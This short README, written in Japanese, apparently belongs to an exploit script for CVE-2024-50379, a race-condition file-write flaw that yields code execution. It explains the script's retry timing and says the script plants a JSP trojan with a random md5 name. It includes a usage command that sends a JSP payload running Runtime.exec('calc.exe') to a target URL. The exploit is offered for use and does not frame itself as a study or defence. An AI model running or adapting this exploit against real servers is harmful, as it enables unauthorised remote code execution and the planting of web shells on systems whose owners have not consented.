
CVE-2024-50379-exp
テストでは、最初の条件競争時に高い確率で書き込みが失敗し、もう一度条件競争をやり直さないとトロイの木馬が書き込まれないことが判明しました。そのため、スクリプトは最初に固定6秒の条件競争を行い、書き込みが行われたかどうかを検出し、書き込まれていない場合は、ユーザーがカスタマイズした時間またはデフォルトの10秒で再検出します。生成されるトロイの木馬はランダムなmd5.jspです。
python .\CVE-2024-50379.py -u http://192.168.31.33:8888/ -f '123456<%Runtime,getRuntime().exec("calc.exe");%>' -t 10
image